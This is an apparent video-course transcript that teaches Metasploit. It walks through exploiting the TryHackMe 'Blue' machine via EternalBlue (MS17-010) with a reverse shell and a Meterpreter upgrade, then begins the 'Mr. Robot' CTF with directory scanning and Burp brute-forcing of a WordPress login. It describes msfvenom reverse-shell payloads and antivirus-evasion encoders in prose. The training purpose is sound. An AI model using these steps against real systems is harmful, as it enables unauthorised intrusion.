Hello beautiful people, welcome back to the branded new session, and in this session there will be two parts. The first one will be I'll teach you Metasploit from the most basic level to most advanced, and once we're done with it, we will perform a hands-on, like we will hack into a machine called Blue. So at first you should learn how Metasploit work, what does Metasploit means, what is Metasploit, XYZ, each and everything. So basically Metasploit is a widely used exploitation framework which have mainly two versions. Remember, Metasploit, we use Metasploit for automation to exploit vulnerabilities. Okay, it has so many modules and so many exploits that you could use against any machine to hack into it. We have Metasploit Pro and Metasploit Framework. Metasploit Pro is basically a commercial version with a graphical user interface for task automation and management. And remember, it have a graphical user interface with web interface too. We can mainly use it for automation and management. After that, we have Metasploit Framework. So the Metasploit Framework is the open source version, command line based. So it is basically command line based, means you will need to use it through terminal, commonly used in penetration testing on Linux distribution like attack box. So you can use it for penetration testing in Linux distributions, and even though you can install it in your Windows machine too, but not recommended at all. So basically, we have different components. We have mainly three components of Metasploit Framework: MSF console, which is the primary command line, and then we have modules. The modules include exploits, means you can hack into the system using exploits, and we have scanners that you could use to scan your targets. Then we have a payloads that you could use against the target. So yeah, there are some more, but let's not talk about them right now. And then we have tools. So basically Metasploit is standalone tool for vulnerability research, means you can do vulnerability research. I have teach you in vulnerability 101, if you remember. There I told you we will explore Metasploit. So yeah, basically you can use it for vulnerability research, vulnerability assessment, or penetration testing using MSF Venom. Okay, so let's use it. How you can basically use Metasploit? You will just need to go to your machine. If if you are using for the first time, I'll recommend you to just update and apt upgrade your machine and wait until the entire system will be upgraded and updated. There will be so many benefits, like you will not face any kind of problems with any kind of software or application that you want to run or script. So you just need to type MSF console, and this is the command with the help of which you will be able to open your Metasploit framework. And you can clearly see it has been opened, and this is how you could possibly use it. Like you can use it for recon, for exploitation. There is a lot of payload and so many things. So basically it have 2403 exploits, 1000 plus auxiliaries, and 42 post-based exploitation. Now what does post-based means, I'll tell you, don't worry. We have more than 1000 of payloads, we have encoders, and the rest of the things. So we have so many things. Now you can run normal commands inside it, like clear and so many things. You can clearly see it is MSF6 Venom. So basically MSF, yeah. After that, we have some key concepts like exploits, vulnerabilities, payload. So basically exploit, code exploiting a vulnerability on a target system. Yeah. After that we have vulnerability, flaw in target system. Remember, vulnerability is flaw in target system which when exploited may disclosure confidential information or allow us to code execution. So basically with the help of vulnerability you can just hack into the system. Okay, and exploit is basically a code exploring any vulnerability on the target system. After that we have a third number, payload. So basically code that runs on a target system, code that runs on a target system giving desired results. Like if you want to access the system, then victim machine, then you have to run some sort of payloads on the victim machine, then you will be able to perform what you actually want. We have Metasploit modules, like auxiliaries. Auxiliaries are basically the supporting modules, means you can do scanning with the help of Metasploit, you can just do crawling with the help of Metasploit. And we have then post. So what does this post means? Useful in the final stage of penetration testing, which is basically a post exploitation. Means once you gain the initial access to the system, what next? You have to escalate your privileges, you have to further exploit that system, you have to do post exploitation. And this kind of modules are very useful in that cases when it comes to post exploitation, means enumerating the system further or hacking deep down into the particular system that you have already gained the initial level, like increasing your privileges from a normal user toward a system administrator and so many things. All right, we have then different commands in our Metasploit that you could possibly use. Remember, whenever you will hack into the system or whenever you will create a payloads, these are the things that will be definitely required. So basically, R host means the IP address that belongs to the target machine that you want to target. So that will be the R host, and then there will be a R port too. So R port basically on the open port are vulnerable port on the target system or target machine where the vulnerable application run. So you can just attack through ports. That's why you have to provide the ports with R port with R host. R port and R host are simply referred to the target IP address and target port address, port number, sorry. After that we have a payload. You have to set up payload, so code to run on the target system. Then we have local basically L host IP. You can set L host, it is for local machine, means your own IP address. You can set it up. Don't worry, we will see all this stuff in our practical, so just don't worry, just listen to my words carefully, right? No, this is something really important. Okay, you have to use the Metasploit framework a lot in your penetration testing journey. That's why I want to teach you on most advanced level and details level. So basically after that we have L host IP address and L port number. L port, so L host means your own IP address, your machine IP address. Okay, and L port means the port where you want to get the connection back, reverse connection. So that will be you will need to set up the L host and L port on your own machine. L host will be considered as the attacking machine IP address, means your, and L port will be considered as the port number on which you want to get the reverse connection. Like last time I used 1337, if you remember. If not, it's okay. We have additional components like encoders. In basically you can encode your payload to invade the antiviruses. Like if there is chances to detect your payload, or you can say exploit, you can use encoders in order to encode your payload, so there will be a less chances of if it is detection. Then we have evasion modules attempting to directly invade antivirus. You can also use this evasions module in order to bypass the antiviruses. Sometimes it works, but in modern world applications, all the honest with you, it didn't work at all. You have to do this thing customly. So then we have exploits, which is basically organized by the target machine, and we have we have some knobs that you could possibly use in buffer overflow attacks and other things. So I'll not go into it right now. Okay, it is buffer overflow didn't include in offensive security path. After that they just remove it. After that we have payloads, code run on the target machine category as a single stager and stage. So basically we have different type of payloads like single payload, stagers payload, and stage based payload. So basically these are the codes that will be that you will need to run on the target machine in order to get the reverse connection. I have already told you how you can open the Metasploit. So you can basically use MSF console in order to run the Metasploit. After that, if you want to search for any module, you can literally search for it by just providing the name of the module. Let's say search scan. So you can see that we have different scanners, auxiliary scanners that you could possibly use. So let's say, for example, I'll just do it in this way. So let's clear the screen at first. You can see that we have WordPress registration, SQL injection, authentication is required. So like this kind of modules, or you can say that exploits you could possibly use. You just need to type the number of it. If I scroll down, there is a lot. You can see that we have name, disclosure date, rank, and check whether it is checked, whether it is not, some description about the particular module, or you can call it payload. So after that, we have some enumeration modules, like you could possibly use it. You just need to type use and then the number. For example, I want to use 6 number, so you could possibly use it, and you can clearly see they have picked it automatically, which is basically a scanner for WordPress cart SQL injection. So you can literally use it with the help of just typing. First of all, you just need to type search, and you will need to search about any module. Then you can use them with their name or with their number. After that, if you want to learn more about that particular module or payload or exploit, like clear the screen, you can use it by just typing show. Let me see, we have anything else. Okay, show options. You just need to type show options. It will give you all the details that they require in order to execute the particular script. In order to execute this particular, we basically call it module or exploit. After that, you can set the values. Like for example, if you want to set the IP address, you can literally do it. In this case, I'll go back. Let's say I'll go back, and let's say I'll search SMB v1. Let's say it was the vulnerability, eternal blue vulnerability in our Windows machine, when the hackers exploit WannaCry. If you remember, they just hack into the so many system with the help of WannaCry ransomware. So basically, you can use it by just copying the name, or you can just copy the name, or you can even though use the number. So you can just type use and then paste it. So yeah, this is how it looks like. Then you can just type show options, and here you can clearly see it is asking for L host and L port, and then it is asking for R host and R port. Let's set them. So you just need to type set L host, which will be our target, which will be an attacking IP address, in this case mine one. So I just need to type if config, and you can clearly see my tunnel 1 IP. You can use it. If you do not have tunnel 1, or if you are not working, if you are working outside with a real machine, you can just use it your Ethernet IP or your So basically, let's use this one for the sake of the tutorial, and you have successfully set it. After that, you just need to set the port. Let's say we have to set the L port, which is basically the reverse connection port. So I'll just type 1337 for example. After that, you need to set up the R host. We use R host in order to set up the victim machine. You can see there is nothing like here. We need to set it. Let's say 192.163, anything. For example, I'm just giving you an example. This is a dummy data. I just want to show you how you can fill this. After that you can just set the port on which the service is running. So let's make it as the default one, or you can even though set it up. So if you again see the show options, you will see that yeah, you have now added the R host here, and you have added the L host, L port, and all this work. This is how these things work. So, and at the end of the day, once you've done everything, you can just type exploit and run the exploit, or everything will be run for you. And if you are lucky, if the vulnerability exists on the target machine, you will get the reverse connection here. Means that no, you will be able to do remote code execution to run the arbitrary commands on the server. Okay, this is how it works. After that, for example, if you get the session, then how you can check for how many systems I hack into it, how many sessions I have. So you can just type sessions. You can clearly see there is no active session right now, but whenever you will get the session, you will definitely here you will find your all active sessions that you hack into, basically those machines that you hack into. After that, you can interact with the session. For example, there is a Windows machine that I hacked, or a Linux machine, and I want to go into it. So how I can do it? I can use session -i and then the ID of that session. So just session -i, and then for example it is session 1, so you can just go with it. Right now I do not have any session. So remember, you have to use sessions, not session. Okay, so yeah, keep in mind, just avoid these little mistakes. So just you can use it. Right now we do not have any session, that's why it is giving me an error. You can perform Nmap scan, which is not recommended at all. We have Nmap scanner. You can use TCP port scan, not recommended at all. We have Nmap for this. You can use you can set up the payload. For example, if there is any kind of payload, you can set it up by just typing use exploit multi-handler. And then if there is any specific, for example, if there is any specific payload that you want to set, you can set it up with the help of set payload. So yeah, you can set it up. We will see this in future, so don't worry. And after that, for post exploitation, you can use, these are the just keywords that we will possibly use it in future while hacking into different machines. So for post exploitation, you can just use post multi gather, it will work. And for evasion, you can use this. For credential enumeration, you can use this. And yeah, I think it is enough. Then I have typed some payloads. I have typed some commands with the help of which you can possibly create exploits for Windows or for server that is that have PHP background language, for ASP Windows machine. And even though you can create your own exploit in Python. So how you can do it? You can actually do it with the help of MSF Venom. You can clearly see MSF Venom space -p payload. Like if you want to create it for Windows, you can just type Windows /Meterpreter /reverse TCP. Then you can just set up lhost equal to your IP address, your attacking IP address, and then you just need to type space, then L port for the L port that you want to set up for a reverse listener. No, you will be confused that hey, what does this mean? Just don't worry, this is something how you can create payloads for the Windows machines. Okay, and then what is the type? So it will be exe based, and you can just redirect the output into a reverse shell.exe, and it will create a reverse shell for you. Then whenever you will execute on any target machine, you will get the reverse connection. This is how it works. We will see all this stuff, don't worry, in our practicals when we will exploiting different machines. So right now I'm just teaching you how you can use it. Even though you can just copy the payload and you can do some modification in it by just putting your own IP address. Let's say what is my IP address? If I type if config, let's say I'm just giving you example. Okay, let's say this one, the tunnel IP address. So I'll just paste it here as an example. After that, you can just set the port, for example 1337 as a reverse listener. So you can just copy it, and then you can just open and clear the screen and just paste the command. The MSF vnum will create the reverse shell for you within few seconds. You can clearly see they have created for me. So if I ls it, you can see that I have a reverse shell.exe, and later on you can execute it on the victim machine. Then you can create it for PHP servers with the same way you can create it for the ASP, okay, and you can create it in Python too. So for if someone have Python installed, if they execute it, you will definitely get their Unix based, it doesn't matter which distribution they are using, you can get their reverse connection. So this is how the Metasploit work, and after that we will literally put this all together in order to perform five tasks. The first will be recon, the second one will be gaining access, the third one will be escalating our privileges from normal user towards a root user, then we will crack the passwords, and at the end we will try to find out the flags. So this is how it works. I hope you have learned a lot in the practical, in the theoretical as well as a little bit practical of this module. After that, after this we are going to learn to put this all together in one frame that we have learned. So stay with me, because the second part is going to be so much fun. This is going to be a practical tutorial. Yeah, take care of yourself. Alright guys, welcome back to the second part of our Metasploit module. And earlier I have told you that we will apply all the knowledge that we learn. So in this section, or in this practical demonstration video or tutorial, we are going to perform 5 tasks. The first one will be recon, okay. The second one will be gaining access to the target machine. The third will be escalating our privileges, means post exploitation. The fourth one will be cracking the passwords, and the last one, ultimate goal, is to find out the hidden flags. So all you need to do is to open your machine, and after opening your machine, you just need to log into your try hack me. After this, you just need to click on learn. Just go to the learn section, and then here you will get an option of search. So just click on it and type blue. This is a vulnerable machine where we are going to hack into it. So after that, we just need to exploit this machine. Okay, so after this, the next thing, when you just click on blue machine, you will find out that here we have the machine. Okay, so you just need to click on start the machine by clicking here, and the machine will be started within 1 minute, and it will assign you an IP address. Okay, so we have different phases that we are going to solve. Recon, gaining access, escalate the privileges, cracking the password, and find the flags. So let's do it one by one. They have already assigned me the IP address. Okay, so once you get the IP address, the next thing that you will need to do is to start doing recon. And remember, you will need to connect with your OpenVPN. So to connect you with your OpenVPN, this is the command. We already did it earlier. Remember, whenever you will try to go for try hack me rooms, it is must that you should connected with OpenVPN. So you will be connected with their network, and you will be an internal user of their network, so that's why you will be able to use their resources. Here I have already connected, and the next thing is I'll just need to search, I'll just need to scan for Nmap. So just type Nmap, and then SV, and then SC and PN, Okay, the next thing that you will need to do is to provide the IP address. So just hit enter. Now you will be confused, what does this SC and SV means? We earlier talked about it. SC means default script, it will look for the vulnerability, SV vulnerabilities, and SV is used to enumerate the application's versions. Okay, and PN to skip the host discovery phase, as some host will not respond to your ping request. So sometimes the host will not working, that's why you will need to put the PN2 and then the target IP address. Basically after this we will need to wait a bit until it started giving us the results. So once it gives us the result, then I'll show you what to do after that. So we will need to wait until we get the result. Remember, it might take some time, so I think we should not wait for the results. I'll show you how they looks like, but don't worry, we will also see it in the real response once we get it. So this is how it looks like when you will scan your target like Nmap SESV. You will get the Nmap scan in this way, and here you can clearly see we have some ports open. 1 2 3 4 5 6 1 2 3 4 5 6, almost we have 6 ports open, and we have basically 6 ports open. So basically we need to look into those ports in order to find out the vulnerabilities. And remember, the only ports that we can enumerate it at the moment are 137 or 139 port, which is basically used for SMB. We basically use SMB in our Windows. And then we have 135 port for RPC. So you can clearly see we have so many ports, like the end 4 ports you can clearly see they all use for RPC. So we will take it as a one core and let's name it 135 port. If you scan this 135 port, this will be considered as for all. So currently you can just scan these 2 ports, or even though if it feels you that you should scan all, then you can literally scan all of them. Remember, you have to run a script on them in order to find vulnerabilities into them. And once we get the results here, after this you will get something like this, okay, where you will learn that, hey, I have these so much ports, so I can scan the ports and try to figure out the vulnerabilities into them. Once you done it, after that you will need to use Nmap. Okay, Nmap P stand for the ports that you want to scan, and I will mention all the ports that I have discovered here. Okay, so you can just mention them, and after that you can use PN. It is sometime compulsory because the host will reject you, that's why. And after this the main thing is you have to check for the vulnerabilities. So currently I'll look for SMB vulnerabilities. It might be possible that the vulnerabilities exist in SMB client, so that's why I'll just type the SMB script for it. And the default script for SMB vulnerabilities to find out vulnerabilities in SMB versions are basically -- script SMB vuln, and then this static represent that please give me all the possible vulnerabilities that is related with SMB. And then at the end you just need to specify your host, you just need to specify the target. So here our target is basically this one. This is going to be our target, so we will simply replace the IP address with this one. You can just simply replace the IP. Now you will get these notes as well as you can just do practice over it. Okay, what I'm trying to do here, I'll just copy the command. You can just type it manually. So to save the time, I'm just doing it a little bit faster. So I'll just copy the command, and after copying the command I'll just go back to my machine, and here what I'll need to do, just open the terminal. Remember, it is taking time, you can clearly see, that's why I'm just shifting myself to the next phase. You can wait for it, and then you just need to paste the script. nmap command, definitely it will look for the SMB vulnerabilities, and it will give you the result. And you can clearly see that those ports that I have scanned is basically it shows me, you can clearly see it is vulnerable. Okay, it is basically vulnerable with SMB vuln, and the vulnerability is basically MS17010. Okay, if you copy it and then just go to the Google and search it, you can clearly see there was a critical flaw in SMB version. So yeah, this is basically security update for Microsoft Windows SMB server, and that was the vulnerability. So we have confirmed that it is the vulnerable SMB version, and it exists here, and they have definitely called it the CVE. They have assigned it a CVE number 2, if you can see it clearly. So you will be able to see the SMB version, and after that CVE name. Yeah, definitely you can clearly see that I have got so many details, so many. Yeah, Windows SMB remote code execution, and here we have rapid 7 and SMB. We have literally exploit available on exploit dv2. So this is how it works. When I successfully confirm that the vulnerability, the remote code execution vulnerability exists in Microsoft SMB v1 server. So it is basically SMB v1 server where the vulnerability exists. I just confirmed that it is the SMB v1 version where the vulnerability exists. The next thing is, I'll just open a new tab, and here I'll just type MSF console. I'll exploit this vulnerability with the help of Metasploit. I have told you that we are going to use Metasploit, and now the next thing I'll need to do is to search for the exploit. Is any exploit available for SMB v1 version? So you can just literally copy it and search for it. So just type search. It will look for the exploit that is possibly available for SMB v1. If the exploit is available, it will show us, otherwise there will be no result. And you can clearly see there are basically 2 exploits available. There are literally 2 exploits available that you can use in order to exploit this particular vulnerability, and this is the first one, Eternal Blue, and this is the second one. So all we need to do is to use the first one exploit available. Okay, so just type use 0. What is the number? It is the number. You can use 0, or even though you can use the name, so it doesn't matter at all. Okay, both are fine, you can go with it, and you can clearly see that it successfully worked for us. Now the next thing, I'll just type show options in order to confirm what are they expecting me. So we need to provide the L host, L port, and then we need to specify the R host too. So at first I'll check my IP address. I'll just need to open a new tab, and I'll type here if config, and this is, you will need to use this tunnel 0 IP. So this is going to be my L host. I'll just copy it, and after copying it, what I'll do here, show options. Yep, the next thing I'll need to do is to provide the L host. So you just need to type set L host and then provide the IP address of your machine. So I have successfully provided. After that, you need to provide the L port. You can just if you are comfortable with this port, it's totally fine, you can use this one. There is no need to mess with ports, but remember, if there is no port available, if this place is empty, then you will need to fill it by just typing L set L port, and then you can specify any one port that you are interested in. Right now I will set it as a default, and for R port there is a default port too that used by SMB, so I do not need to mess with it. The only thing I need to provide is R host. So I'll just copy the IP address of the victim machine, which is this one, the server, and I'll just type set R host and just provide the IP address. And literally you can clearly see when I just type show options, you can see that it is the localhost L host that I provide, and it is the L port that is by default, and then here we have the R port that I have assigned right now. The next thing is which is a bit important, we just done with enumeration phase. Now we are in a gaining access mode. So what I can do in this phase, I'll need to set the payload. To set the payload, you can just type set payload Windows x64 shell reverse TCP. You can just copy it and paste it in the terminal. Otherwise you can just type set payload and then Windows x64, and then you just need to type shell and reverse TCP. That's all you need to do. So you can clearly see we have successfully set the payload, which is this one, and this payload will get executed. After this we need to do nothing but just clear the screen, and now I need to run the script. So I'll just type exploit. If the target machine is vulnerable, it will give me the reverse connection. You can clearly see it has started sending the exploits, and you can also see that they are just telling me that hey, the target is vulnerable. So the target is possibly vulnerable. I hope it gives me the reverse connection. So it is sending the payload. We need to wait a bit until we get the access, and boom, you can clearly see that literally I got the access to their machine. Now I am basically into their machine. I got the reverse connection. So if I type ls, basically this is a Windows machine, so you need to type dir not ls, and there is so many things. I don't know where I am. Basically I'm in system 32, so you just type cls, cl, whatever it is. I think the command is that you just need to type who am I, if it works fine. So yeah, I have the authority. I'm a system user. I can do whatever I want to do. So I'll just go into the cdc drive. I forgot. Okay, you can just dir it, and you can clearly see we have the first flag. So you can just yeah, you can just look into it. After that I just successfully got the reverse connection. So now what next, like what we need to do? The next thing, I think I'll need to do something also. Just please give me some time. Let's see how it works. And you can also see we just got the scan result too. These are the open ports. Okay, these are the open ports. So you can otherwise here this is more suitable result. These were the 4 ports that we scanned. Okay, so these were the 4 ports that we scanned for SMB enumeration, and we got vulnerabilities into them, and with the help of that we just use Metasploit in order to exploit the vulnerability, and literally we successfully exploit the vulnerability. Okay, after that if you want to do post exploitation, so basically we have different flags. You just need to type flag1.txt, and you can clearly see by just typing in Linux you use cat, but in Windows you need to type in order to cat anything. So this is the first flag. You can submit the first flag, and there are basically 3 flags. After that, the next thing that you will need to do is is to do post exploitation. So I'll just type background. So what it will do basically, do you have any idea what it is going to do? So even though if you can just type Control Z and it will automatically put that session in background. So just hold the control and just type Z, and you can clearly see it is asking me that background session is 1. Do you really want to do it, yes or no? You just need to type Y, and you can clearly see I just pull out myself from the current session. No, I am outside of the session. So after that, what I'll need to do, as you can see, we need to escalate our privileges, as I have already get the access to the machine. Okay, so the next thing is to do privilege escalation. To escalate your privileges, you just need to type search shell to I think it is shell to Meterpreter. If we get the Meterpreter shell, that will be fine. If I only type shell, so let's clear the screen. Search shell to Meterpreter, and you can clearly see I have this one module that we basically use it for the, you can call it, we basically use this in order to do post exploitation. So just type use and then just assign the number, which is 0 basically, and I'm just doing it slowly so you will be able to. Okay, so you can clearly see I just shifted myself from this to this. Now the next thing you need to do is to just type show options to see what they are expecting me. They are basically expecting me the local host. So I'll just need to provide my IP address. You just need to type if config and copy the tunnel 0 IP address. After copying it, the next thing, just assign it. So just type set LHOST and assign the IP address. And then the most important thing is you need to assign the session. So to look for the session, you just need to type sessions, and you can clearly see we have one session with the ID 1. So you will need to assign the session. To do this, what you can do basically, you just need to type session set session and 1. That's all. So we have set the session. After this, I think you just need to type run. So it is trying to upgrade the session IP first session. What I'm doing here, I'm just doing post exploitation, and you can clearly see it is sending the payload if we get successful. And yeah, seems like we just get successful, and we just got the second session too. Okay, so you can just type anything, it will be executed by itself. You can now clear the screen and type sessions, and you can clearly see here I have Meterpreter shell. So Meterpreter shell is more way you can say powerful. It is basically a root shell where you can do whatever you want to do, the most powerful shell. So just type, no, we need to go inside it. I have already get the reverse shell, I have already get the Meterpreter shell. Okay, the next thing is like how I can connect myself with this shell. You just need to type session, if you remember, sessions -I, and I'll type the session ID, which is basically second. So I want to connect with the second session. If you remember, I just pull out myself, I just exit the first one. So no, I want to go inside the second one, and you can clearly see they have allot me the second shell. So if I type ID, who am I just forgot, it is a window machine. You can just type sysinfo, and it will give you all the information about this computer system. So it is basically a John PC, and it have Windows 7, so x64 beta. I mean, we got everything what we need to do. We have the system authority role. Okay, we have literally the system authority role, and let's see, just the next thing that we need to find out is to check for the to look for the you can say second flag. So just type search f and -f flag 2.txt. It will look for the flag 2.txt. If it is available on the machine, it will provide me. It definitely takes some time because it will look for every possible directory in the machine. So this is how it works. I think that was pretty easy, and it seems like we got one result, and you can clearly see the flag exists here. Okay, this is the flag which exists here in the config directory. So you can just copy the full path. This is the most easy way, to find hidden flags in Windows. Remember this command, never ever just forget it. You just need to type search -f, and then you need to provide the name of the file that you want to find. So I'll just find type, and then I'll type the full path of the flag. I think it didn't work for me, so it seems like I need to go inside it. So I'll just go, no worries at all. Okay, I just forgot. So after that, the next thing is I'll need to do is to go into the system32. So yeah, it should be system. What I just did. Okay, I'll need to go into the Windows. Sorry, so just type Windows, and then I'll need to go into the system32. Okay, just type system32, and you can clearly see, just dir it, and it will show you all the possible stuff into it. Okay, I'll need to go into the config. So after that, just dir it, and I think there is a flag2.txt. you can clearly see. Okay, this one. So you just need to type what just I did. So you just need to type and then flag2.txt. it will definitely work for you. Type flag2.txt, or even though try to get it. You can get it, and you can clearly see that this is going to be the flag that we have discovered. So you can submit this flag, and this is the finding flags, the last one. So the first flag we have already find out. The second one, you can just copy the entire flag if you want. Like, I'll recommend you to solve those steps one by one. I have already created a notes for you, so you can just refer to them too. There is not a big problem at all. So you can just provide it, and you can see that, hey, wow, we have just got it. After that, you just need to find out the final flag. So it seems like I just forgot what was the command to clear the screen. I think it was cls, but it didn't work for us here. No worries at all. The next thing, I'll just go into the C directory, and here I'll need to find out the third flag. So you just need to type do you remember what we typed last time in order to find out the flag? So it seems like that time we use search f and flag3.txt. Search flag3.txt. you just need to type the -f. Yeah, and you can clearly see it is basically in user John documents directory. So you can just go into the user John. Okay, that was John, not John. So lol, it didn't work, so no worries, just do it manually. Cd John. Now why it didn't working for me? So we will need to look into it. Where is the John? It is, I think it is inside in user. So we need to go to the users and just dir it. Yeah, we have a John user here, so just go into the John, and when you dir it, you will be able to find out so many files. And basically here we will must have something called flag3.txt, if I'm not wrong. Just what I just did, we need to check. Okay, so basically it was in documents John, and then we need to go into the documents. So just go into the documents and then delete, and you can clearly see that we have flag 3.txt. so you can just open it with type. If it didn't work for you, you can just directly cat it, and you will get the third flag. You can just submit this third flag, and the lab will be solved for here is a thing like they ask us to do password cracking. So in this case we just got the root privilege escalation, so there is no need to crack the password. You can do it by yourself if you want, but I have got the root privileges. No, I can do whatever I want to do, so it is the most higher privileges. There is nothing else we need to do. So I have provided all the steps in the notes, so you can just refer to them one by one. I have just typed each and everything, and I'll recommend you to go through the notes. If you facing problem, just rewatch the video. This tutorial was a bit lengthy, but this is how the penetration testing things work. So we are here to do some hands-on. This is not about only learning some basic about Metasploit. This is all about learning the real penetration testing skills, and for this reason you are basically enrolled into this course, and my main goal is to teach you something that is the best way. So this is how, and even though these you can apply these steps in your penetration testing report, we will learn it later on. So I hope you learn a lot from this session. Take care of yourself. Have a good day. Bye. Alright guys, welcome back. So today we are going to solve a tough challenge that is might be a little bit tough for you, and we are actually going to play a CTF to solve a room. So basically the name of the room is Mr. Robot, and based on a web series. Yeah, so we are going to solve it. Let's explore. So the first thing I'll need to do is to open my Chrome. If you remember, we are working on tryhackme, so I'll just go to tryhackme.com. It is a complete box where our aim goal is to teach you how you can conduct a pen test, how actually penetration testers perform pen test on target machines. So we will start everything from scratch. You can just go to the learn phase, and then you will get here, let it be reload. Yeah, you will get here an offensive security penetration testing. Here, offensive pen testing. So just click on it. After clicking on it, scroll it down, go to the extra credit, and here we have a machine called Mr. Robot CTF. Just open this machine. That is great. After opening the machine, you can literally just do one thing. You can actually start the machine by clicking on hack the machine, and here we have. So we have started the machine. The next thing is we need to connect ourselves with the with their network. So to do this, I'll just open my terminal and I'll go to my downloads, and here I have OpenVPN, so I can just literally type OpenVPN and then the file of the VPN that I want to connect with. Here it will assign me an IP address. You can clearly see this is not going to be my IP that I'll use, and the machine will be started in few seconds, so no worries. The first thing that they are asking me to connect yourself with the network. So yeah, we have already downloaded the file and we have already connected. So you can just verify it. You are ready to use the machine. You can just solve it. Solve this both. No, they are expecting you that you should connect with their network, then you will be able to open it, to access it. So you can just click on access and see if you are connected here. It means that everything is fine, everything is done. That's really cool. Yeah, so this is the IP address of the target machine, okay, that we are going to hack into. At first we will hack into it, then we will literally you can say get the complete access by routing the server. So yeah, it have two phases. The one is to gain the initial access, and the second one is to escalate your privileges. So what are you waiting for? Let's start it. The first thing I'll run nmap our the target IP address in order to see what kind of ports they have open. So you can just type nmap, and I'll just go with aggressive scan, okay, with -a, and just type the IP address. Now this aggressive scan will basically enable operating system detection, version detection, and it will try to run script scanning for in order to find different vulnerabilities into my target machine. So it might take a bit time. It's definitely, you know, nmap scan, you will need to wait for the output or for the results. All right, so until we wait, as for me, I know that there is 80 port also running on this. Okay, we got it. So you can clearly see we have 22 TCP port open for SSH connection. We have 80 port open for HTTP websites, and it seems like we have another port for websites with SSL, which is basically 443 open, which is also for FTP. So for HTTPS, sorry, okay. And then you know, we just come to know that there is some sort of website running over it. So I can just go to my browser and hit the IP address to confirm what kind of website it is. So basically it is something loading on the browser with the provided dummy data, and you can see, hello friend, if you have come for a reason, blah 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 blah, so many and so many things. If I just click on web page source code, you can clearly see there is nothing but just some scripts that's running on background, and here you can just provide typing. It is a kind of cool interface where you can type something. Okay, so you don't know me, okay, it's okay. So the next thing that we can do, I have come to know that it is a kind of, you can say, website, but I really have no other pages into it. That's why I need to find out what kind of website it is, what kind of data it contains, is there any secret files that it contains. So we need to use GoBuster, okay, let's say. So I'll just type with what just I did, GoBuster. GoBuster is not installed, so just go with Y, it will be installed. You can use FarrowBuster, GoBuster, DeerBuster, BurpSuit, whatever, doesn't matter at all. So this time let's check it. Yeah, it is working fine. So GoBuster, then I want to do directory scan to find different hidden directories. So I'll just go with directories and -u for the target IP address. That's why I'll need to provide the target complete IP by excluding this join. So just provide it and paste it here. After pasting it, the next thing is you need to provide the world list. So the world list by default is in user share world lists dirb, and there is a common.txt in the dirb, if I'm not wrong. Yeah, there is a common.txt file by default in your Linux or Kali Linux operating system, remember. So that's cool. Yep. And all we can do is, you can save the result as an output. What it is, it will discover. You will be able to get that in the output file if you want, in case. So you can just go for it, and it will start scanning for you by finding different directories. So it have just find a 0 directory. It have literally find admin directory with 301 status, means that it is redirecting to somewhere else. So if the scan is still 14% completed, it is trying to find out different things for us. So it have find the admin directory. Let's see what kind of admin directory it has. So if I go with the /admin, you can literally see it is keep reloading. It is a kind of redirection to the reload page, nothing else. So no worries, I'll just go back and I'll wait. I'll literally wait. So it have discover we have to focus on those 200s. They are really important for us, like, to be honest. So the scan is still incompleted, we need to wait. Can you see something? Can you see something here in the login? When it have discovered login for me, it is redirecting to vplogin.php, which means that there is a WordPress website. So if you copy this and then go back to the website and just paste it here, so yeah, you can see that we have discovered the admin panel. It is actually a WordPress based website. It is a WordPress website that we have discovered the admin panel in this case. So we just come to know that this is the WordPress website, which is cool. And we have to be honest and we have to keep waiting until we get the complete results. So the scan has been finished. You can just one time overview it, like admin. It is keep redirecting HTML and those stuff. Okay, one important thing that I have discovered here, it literally discover robots file for me too. So it discovered that is basically robots.txt with 200. Okay, sometimes this robots.txt also contains some confidential information, so you can always check into it. Just copy it and paste it after the target, and you can literally see I have added here 2 / till it is working, but that's not a good practice. You can see that it have discovered 2 files for me. The one is something, I think, a dictionary, and the second one is key. It is something like key 1 out of 3. They might be possible they are expecting me to provide some key. So if I hit the key, you can see this is the first key. You can copy it. There is always some keys in CTF challenges, so you can submit the key. And yeah, it is the what is the first key, we just discover it, so just provide the key. We just done with the key. The next thing that we need to do is to check out what kind of F society disk it is, or dictionary list, whatever. So I'll just hit enter by providing it, and you can literally see it is a file. So it might be a very important file for us, so I can literally copy it and then I can download it on my machine in the download section. So what I'll do, I'll just type wget and the complete path of the file, and you can clearly see it has started downloading. It will be downloaded soon. But for me, like, to be very honest, that's good. Everything is working fine, and I think I just do not need to perform anything else. Yeah, everything is cool. We are going good. So the next thing that we need to do is to find out to hack into the block, to hack into this website. Now, to hack into the website, if I type username admin or password admin, you can literally see that invalid username. Okay, which means that the username is invalid. So we need to first find out the username, and then we need to find out the password for it. Okay, so basically what we can do, we can brute force that file that I have downloaded right now. So this is the file which is basically 6.91 MB. It might be possible that it should contain some duplicate data. So what we can do now, this is interesting fact, like really I want to teach you something throughout of the box. If you hit ChatGPT and then you just simply uh, yeah, then you just simply type hey, I am on my Kali Linux machine, and I'll just copy the file name. I have this file which might contains duplicate data. Yeah, so give me the command to sort it uniquely so there will be no duplicates. So yeah, you can just hit enter and you can see it have given me the command. So what I can do, you can see that sort disk f society disk, and then it use pipe with unique command and it redirected the output into a unique disk file. So all I can do is I'll just open the terminal and then I just paste the command. After pasting the command, I think I need to create a directory mkdir robot, let's name it robot, and redirect the both files. So just move the f society disk and also the second one f society to basically robots file. So robot directory, I just go into robots which contains my two files. So you can just list it and you can literally see that it is the updated version and this is the older version. The updated version is much have less data as compared to the other one, the first one, because they want to trick us, they want to hang our machine. They have added so much and so much junk and duplicate data. So when I sort it uniquely, you can clearly see the result is here. Okay, after this, the next thing you will need to do is to I think it seems like we need burp suit for this in order to in order to wait a second. So I'll open burp suit, cd home desktop. Where is my burp suit? It is basically in the download, cd downloads, and then we have so I'll just open my burp suit with java-jar and it will be opened. So you can just go with it. After that, you can just click next and next, and all you can do is to wait a bit. We have successfully opened. The next thing you will need to do is to visit the particular web page. So I hope it do not ask me for the login. Yeah, that's cool. So all we can do is to copy the use the username and admin page, but remember, meanwhile we have to capture the request. So you can just go to the proxy and turn on the interceptor and click login. When I click on login, you can clearly see I have intercepted the request with the username and the password. So I want to brute force the username, that's why I will send the request to the intruder for brute forcing. I have sent the request to the brute force. Now I will double click on the log, which is basically the login user, and I will click on add. After clicking on add, the next thing I'll go to the payloads, and here I will load my list, which is updated list, if you remember. So I'll just go to the home directory if I'm not wrong. So home Kali, and I think it was in desktop with the file called robot. No, I think it was in downloads, not desktop. So go to the Kali and then just go to the downloads and go to the Mr. Robot, and here I have the second one, unique disk list. So just select it. After selecting it, you can clearly see unit 10, 100,000, 10,000. 